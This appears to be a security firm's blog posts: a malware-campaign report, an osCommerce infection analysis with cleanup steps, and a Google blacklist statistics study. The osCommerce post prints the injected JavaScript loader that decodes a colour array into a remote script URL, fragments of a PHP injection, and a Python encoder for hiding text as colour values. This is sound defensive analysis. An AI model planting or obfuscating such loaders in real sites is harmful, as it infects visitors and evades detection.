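            env[m.group(1)] = m.group(3)       # later assignments overwrite earlier ones
            continue
        m = ASSIGN_CAT.match(stmt)
        if m:
            name, base, args = m.groups()
            pieces = [base] + [a.strip() for a in args.split(",") if a.strip()]
            env[name] = "".join(env.get(p, "") for p in pieces)
            concats.append((name, env[name]))
    return env, concats


def recovered_urls(js):
    """Every assembled string that turned out to be a URL."""
    return [v for _, v in evaluate(js)[1] if v.startswith("http")]


def recovered_elements(js):
    """Specific to this snippet's layout: concat results come in triples of
    element name, attribute name, attribute value."""
    values = [v for _, v in evaluate(js)[1]]
    return [tuple(values[i:i + 3]) for i in range(0, len(values) - 2, 3)]


if __name__ == "__main__":
    for tag, attr, value in recovered_elements(PRW1_SAMPLE):
        print("<%s %s=%r>" % (tag, attr, value))
```

Because the same short names (h, i, z, c and so on) are reassigned between the two halves, the replay has to be sequential; resolving each concat against the final variable values would produce garbage for the first iframe.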

Growth of Infected Sites
The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

Blacklist Services Not Reacting Quickly
Current website reputation services have not yet started flagging sites carrying this specific malware. Many infected sites have not yet been blacklisted by Google Safe Browsing (which Chrome and Firefox rely on), Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which had not yet been blacklisted and will infect visitors.

Infected sites that have not been blacklisted (As of April 23, 2011):

www.kittyshomestore.com/
muinvader.com/
zirimi.com/
ipcontext.com/
www.bonitalions.org/
www.sobragen.org.br/
www.biostyle.ru/
www.cnicanada.com/
www.ceomanitoba.com/

Anti-Virus Not Capable of Detecting the Infection
Anti-virus engines are woefully inadequate at hunting down web malware. We present screenshots showing the poor detection capability of anti-virus engines with respect to this specific piece of malware: only 1 out of 41 AV engines was able to flag it.

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

osCommerce: Identifying Malware

April 19th, 2011

Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business is conducted by small to medium sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart to allow users to pick and choose what they would like to buy and then pay via a number of payment methods.

One popular application software that web site owners use to manage online transactions is called osCommerce. Thousands of websites use this software. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software like osCommerce. In this post we discuss the specifics of this attack, and how to identify the malware which is injected as a result of this intrusion.

Identifying the Malware
The malware targets osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart – in turn, causing website visitors to become infected. This strain of malware has been extremely pervasive.

We have seen variants of the following malware on web sites running shopping cart software by osCommerce and OpenCart. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

<script type="text/javascript" src="catalog/view/javascript/unitpngfix/unitpngfix.js"></script>
<script type="text/javascript">
if (typeof(redef_colors) == "undefined") {
  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d');
  var redef_colors = 1;
  var colors_picked = 0;
  function div_pick_colors(t, styled) {
    var s = "";
    for (j = 0; j < t.length; j++) {
      var c_rgb = t[j];
      for (i = 1; i < 7; i++) {
        var c_clr = c_rgb.substr(i++, 2);
        if (c_clr != "00") s += String.fromCharCode(parseInt(c_clr, 16) - 15);
      }
    }
    if (styled) {
      s = s.substr(0, 36) + s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime() + s.substr((s.length - 2));
    } else {
      s = s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime();
    }
    return s;
  }
  function try_pick_colors() {
    try {
      if (!document.getElementById || !document.createElement) {
        document.write(div_pick_colors(div_colors, 1));
      } else {
        var new_cstyle = document.createElement("script");
        new_cstyle.type = "text/javascript";
        new_cstyle.src = div_pick_colors(div_colors, 0);
        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
      }
    } catch (e) { }
    try { check_colors_picked(); } catch (e) { setTimeout("try_pick_colors()", 500); }
  }
  try_pick_colors();
}
</script>
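
The following is an added Python port of the decoder in the snippet above (not the page’s own code) so the hidden URL can be recovered offline: each colour value carries three bytes, and each byte is the hex value minus 15. Running it over the colour array from the sample returns the script tag the page writes and the bare URL it assigns to new_cstyle.src; the cache-busting timestamp is passed in as a parameter. The encoder at the end is included to show that any text can be hidden this way behind what looks like a CSS palette.

```python
# The colour array from the snippet above, as the sample input.
DIV_COLORS = ['#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183',
              '#748783', '#3e7970', '#857082', '#728178', '#7f8331',
              '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277',
              '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d']

OFFSET = 15   # the snippet's parseInt(c_clr, 16) - 15


def decode_colors(colors):
    """Port of the inner loops: three byte pairs per colour, each shifted down by 15.
    The '00' skip mirrors the snippet, which uses it to drop padding."""
    out = []
    for c_rgb in colors:
        for i in (1, 3, 5):                # substr(i++, 2) with i stepping by two
            c_clr = c_rgb[i:i + 2]
            if c_clr != "00":
                out.append(chr(int(c_clr, 16) - OFFSET))
    return "".join(out)


def div_pick_colors(colors, styled, cache_buster="0"):
    """Port of the outer function. `cache_buster` stands in for new Date().getTime()."""
    s = decode_colors(colors)
    marker = colors[1][0] + cache_buster    # div_colors[1].substr(0, 1) is '#'
    if styled:                              # document.write() path: whole tag
        return s[:36] + s[36:len(s) - 2] + marker + s[len(s) - 2:]
    return s[36:len(s) - 2] + marker        # createElement path: bare URL for .src


def encode_colors(text):
    """Inverse of decode_colors; pads the last colour with "00", which the decoder skips."""
    hexes = ["%02x" % (ord(ch) + OFFSET) for ch in text]
    hexes += ["00"] * (-len(hexes) % 3)
    return ["#" + "".join(hexes[i:i + 3]) for i in range(0, len(hexes), 3)]


if __name__ == "__main__":
    print(decode_colors(DIV_COLORS))
    print(div_pick_colors(DIV_COLORS, 0, "1303000000000"))
    print(encode_colors("<script"))
```

Once the array is decoded the remote host is plain text, so it can be added to a block list and searched for in proxy logs; a signature on the colour values themselves would be defeated by the next host the attackers encode.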

What this Attack Does
The code in the page does not contain the iframe itself. It decodes the colour array into the URL of a remote script (each colour holds three characters, each recovered as the hex value minus 15), loads that script, and the loaded script then attempts to display a malicious iframe which can lead the visitor to a fake anti-virus (AV) website. This opens the door to malware being installed on the website visitor’s personal computer.

Removing the Malware
In most shopping cart installations, malware will have been inserted in the config.php file on your website. It is usually located in the following place: www.yoursite.com/config.php.

Identify the malware in the config.php file that begins with:

<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7

The malware usually ends with a line similar to:

$ob_starting = time(); @ob_start("ob_start_flush"); } ?>

The entire code present between the start and end signatures shown above must be removed. The ob_start() call registers ob_start_flush() as an output-buffer callback, so PHP hands the output of every page through the malicious function before it is sent; the injected script therefore never appears in your HTML templates, only in the served page.

Conclusion
Following removal of the malware, you must upgrade your installation of osCommerce, to osCommerce 2.3 or higher, and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory or renaming the directory to a value different from the default can mitigate automated attacks attempting to exploit osCommerce 2.2 versions.

If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

Analyzing the Google Blacklist, Part 1

June 28th, 2010

Google’s efforts to clean up the Internet and provide a useful advisory to Internet users has been very successful. Nearly every modern browser now incorporates Google’s Safe Browsing List information, to prevent users from inadvertently visiting malware infested websites and phishing websites.

Motivation
In this article we will be analyzing the Google malware hash lists that have been published over the past few months in order to answer these important questions:

  • How many websites get blacklisted each day?
  • How many websites manage to get off the blacklist?
  • How soon do websites get off the blacklist?
  • How many never get off the blacklist?

These are practical questions which are often posed by frustrated, sometimes confused and angry website owners, time and time again at help forums, and via our contact page.

Resources
Google has done a good job creating detailed help content describing the process of blacklisting, as well as a group where website owners can ask for help. Additionally there are excellent resources like BadwareBusters where users can find volunteers to help them. We also participate in these groups.

Yet, there is still a demand for getting clear cut answers to some basic questions like the ones detailed above. In this vein we want to provide scientifically sound and statistically significant analysis of freely available information to provide clear answers to these questions. A small FAQ is also available on our site to answer questions from website owners and admins.

Goals
This series of experiments is split into multiple parts. This article presents a first look (part 1) at openly available data. The goal of the experiment is to understand:

  • How many websites get blacklisted each day?
  • How many websites manage to get off the blacklist?
  • How soon do websites get off the blacklist?
  • How many never get off the blacklist?
  • How many websites fall back onto the blacklist?
  • How much time elapses before a website falls back into the blacklist?

Methodology
For the purposes of this experiment, Google malware hash lists were collected from March 3, 2010 to June 1, 2010 (113 days), one snapshot every 30 minutes. Each list follows the Google Safe Browsing malware hash specification. All hash lists were parsed; unique hashes were extracted, time stamped and correlated with the malware hash list version.

Subsequently an analysis was conducted to answer the questions posed above. At no point was an attempt made to identify a website name from a hash. Also note that a single website can have more than one unique hash: for example, “www.abcd.com”, “abcd.com” and “www.abcd.com/infected/” can all generate different hashes.
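
An added Python sketch of the bookkeeping behind the figures below (not the study’s own code): given timestamped snapshots of the hash list, it reconstructs each hash’s listing episodes and classifies it as never removed, listed once, or relisted, with listed and clean durations. The snapshots here are constructed daily stand-ins with sha256-derived labels; the real data had a snapshot every 30 minutes. It also separates hashes that were still listed at the end of the window but were added after it began (right-censored), which a naive count would lump in with the never-removed group.

```python
import hashlib


def h(label):
    """Constructed stand-in for a Safe Browsing hash: sha256 of a label, truncated."""
    return hashlib.sha256(label.encode()).hexdigest()[:8]


# Constructed daily snapshots (day index -> hashes listed that day).
SNAPSHOTS = {
    0: {h("a"), h("b"), h("c")},
    1: {h("a"), h("b"), h("c")},
    2: {h("a"), h("c")},            # b removed
    3: {h("a"), h("c")},
    4: {h("a"), h("b")},            # b back on the list, c removed
    5: {h("a"), h("b")},
    6: {h("a"), h("d")},            # d newly listed near the end of the window
    7: {h("a"), h("d")},
}


def episodes(snapshots):
    """Per hash, the (first_day, last_day) runs of consecutive snapshots it was listed in."""
    runs, open_runs = {}, {}
    for day in sorted(snapshots):
        listed = snapshots[day]
        for hx in listed:
            if hx in open_runs:
                open_runs[hx][1] = day
            else:
                open_runs[hx] = [day, day]
        for hx in [k for k in open_runs if k not in listed]:
            runs.setdefault(hx, []).append(tuple(open_runs.pop(hx)))
    for hx, run in open_runs.items():
        runs.setdefault(hx, []).append(tuple(run))
    return runs


def summarize(snapshots):
    """Classify hashes the way the highlights below do, plus a censored bucket."""
    days = sorted(snapshots)
    first_day, last_day = days[0], days[-1]
    stats = {"hashes": 0, "never_removed": 0, "censored": 0, "listed_once": 0,
             "relisted": 0, "listed_days": [], "clean_gaps": []}
    for hx, runs in episodes(snapshots).items():
        stats["hashes"] += 1
        still_listed = runs[-1][1] == last_day
        if len(runs) == 1 and still_listed and runs[0][0] == first_day:
            stats["never_removed"] += 1        # on the list for the whole window
        elif len(runs) == 1 and still_listed:
            stats["censored"] += 1             # added late; fate unknown at window end
        elif len(runs) == 1:
            stats["listed_once"] += 1
            stats["listed_days"].append(runs[0][1] - runs[0][0] + 1)
        else:
            stats["relisted"] += 1
            stats["listed_days"].extend(e - s + 1 for s, e in runs)
            stats["clean_gaps"].extend(runs[i + 1][0] - runs[i][1] - 1 for i in range(len(runs) - 1))
    return stats


if __name__ == "__main__":
    for key, value in summarize(SNAPSHOTS).items():
        print("%-14s %s" % (key, value))
```

With 30-minute snapshots the day index becomes a snapshot index and the durations are divided by 48; the classification logic is unchanged.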

Brief Highlights

  • Total number of unique hashes tracked: 688,602.
  • Average number of unique hashes per day (over the 113 day period): 6,093.
  • 25.8% of hashes never got off the Google blacklist.
    Each of these hashes was listed as infected for the entire period (more than 113 days).
  • 43% of hashes were listed exactly once as infected and managed to get off the Google blacklist.
    The average time each of these hashes spent on the blacklist was 13 days (89 days max).
  • 2% of hashes were blacklisted exactly twice.
    Each of these hashes was blacklisted, removed from the blacklist and then fell back in (the site was hacked again). These hashes remained listed for an average of 19 days (89 days max) and stayed clean for an average of 17 days before being hacked again.

Analysis
It is clear from these initial results that a very large number of websites, roughly one quarter of the 6,000-odd hashes added per day, never make it off the Google blacklist. There are a number of reasons for this. One is that most webmasters, who may be good at website design and layout, may not have the technical skills required to clean websites infected by malware and code injection attacks. We have also met website owners who are extremely business savvy but lack the technical expertise to recover from a blacklisting event. The income lost to business interruption in these cases is considerable.

We see that 43% of websites which get blacklisted manage to make it off the blacklist, but these websites suffer for an average period of 13 days.

Some websites manage to get off the blacklist and then fall in again. The average time for these “repeat offenders” on the blacklist is larger than the previous case. The time for which these “repeat offenders” stay clean is not very high, an average of just 17 days.

Conclusion
These numbers clearly show the current sorry state of website security. It is unfortunate that thousands of websites are affected every day. At stopthehacker.com, we strive to help combat this trend.  These issues need to be addressed specifically by services that currently are not readily available to the masses. To address this vacuum in the service space, and disrupt the security market stopthehacker.com provides its advanced Health Monitoring and Vulnerability assessment services for website owners. Our services take away the anguish which business owners face when their websites are attacked. Please visit our services page to find out how we can help you. In fact, you can even sign up for free services.

Further detailed analysis will be presented in the second part of this series. We will show detailed analysis of the data and will provide more insight on the implications of these observations.

Stay tuned for Part 2!

News, Report, Security